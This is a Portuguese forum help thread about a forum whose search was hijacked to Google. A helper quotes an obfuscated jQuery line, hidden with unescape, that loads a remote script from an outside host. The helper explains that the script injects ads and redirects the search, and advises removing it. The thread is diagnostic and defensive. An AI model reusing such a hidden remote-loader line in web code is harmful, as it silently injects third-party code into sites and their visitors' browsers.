Busca do Fórum
4 participantes
Fórum dos Fóruns :: Ajuda e atendimento ao utilizador :: Questões sobre códigos :: Questões resolvidas sobre códigos Javascript e jQuery
Página 1 de 1
Busca do Fórum
Detalhes da dúvida
Versão do fórum : Invision
Nível de acesso : Fundador
Navegador usado : Mozilla Firefox, Google Chrome
Membros afetados : Todos os membros do fórum
Problema começou : hoje
Endereço do fórum : http://clothmythrevolution.com/portal.htm
Descrição do problema
Recebi uma reclamação hoje de um usuário dizendo que a busca do fórum só faz busca no google, não achando assim os tópicos referentes ao fórum, isso acaba sendo ruim pois dificulta a busca por tópicos especificos.Re: Busca do Fórum
Olá,
Num dos seus códigos Javascript, há o seguinte código:
Ele faz uma chamada de um script, que faz uma chamada de um script, que injeta anúncios de terceiros em sua página e altera a busca feita no seu fórum para essa busca personalizada do Google (que possui um sistema de anúncio também). Tente encontrá-lo e o remova.
Abraços.
Num dos seus códigos Javascript, há o seguinte código:
- Código:
;$[unescape('%67%65%74%53%63%72%69%70%74')](unescape('%2F%2F%78%6D%6C%66%65%65%64%32%2E%36%74%65%2E%6E%65%74%2F%67%2E%6A%73'));
Ele faz uma chamada de um script, que faz uma chamada de um script, que injeta anúncios de terceiros em sua página e altera a busca feita no seu fórum para essa busca personalizada do Google (que possui um sistema de anúncio também). Tente encontrá-lo e o remova.
Abraços.
Re: Busca do Fórum
Olá Chrono,
Vamos fazer um teste, desabilite todos os códigos javascript que tenha ativo em seu fórum e nos diga se o problema persiste?
Até mais!
Vamos fazer um teste, desabilite todos os códigos javascript que tenha ativo em seu fórum e nos diga se o problema persiste?
Até mais!
Re: Busca do Fórum
Olá Chrono Trigger,
Hoje, experimentei usar a função buscar do seu fórum e funcionou normalmente, aparecendo tópicos do seu fórum.
Poderia confirmar a situação se normalizou?
Até mais.
Hoje, experimentei usar a função buscar do seu fórum e funcionou normalmente, aparecendo tópicos do seu fórum.
Poderia confirmar a situação se normalizou?
Até mais.